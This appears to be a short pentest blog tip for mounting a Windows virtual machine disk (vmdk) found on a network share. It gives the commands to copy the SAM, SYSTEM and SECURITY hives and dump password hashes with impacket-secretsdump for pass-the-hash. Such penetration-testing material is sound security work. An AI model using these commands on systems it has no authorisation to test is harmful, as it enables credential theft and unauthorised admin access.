Extract Sam Hashes From Vmdk
How to extract SAM hashes from a virtual machine vmdk
On your internal pentest you managed to find a Windows vm while searching network shares as a low privilged user. If you can extract the SAM hashes from the virtual machine, you may be able to pass the hash and gain local admin access to some systems.
sudo apt-get install libguestfs-tools sudo mkdir /mnt/Win7 sudo guestmount -i -r /mnt/Win7 -a ./Windows\ 7-0.vmdk sudo cp /mnt/Win7/Windows/System32/config/SAM . sudo cp /mnt/Win7/Windows/System32/config/SYSTEM . sudo cp /mnt/Win7/Windows/System32/config/SECURITY . impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL sudo guestunmount /mnt/Win7
If guestmount gives you a lot of output, you’re probably mounting a split disk and you’ve chosen the wrong vmdk. In this case, the first was named “Windows 7.vmdk”, the second disk was “Windows 7-0.vmdk”.
Written on January 19, 2023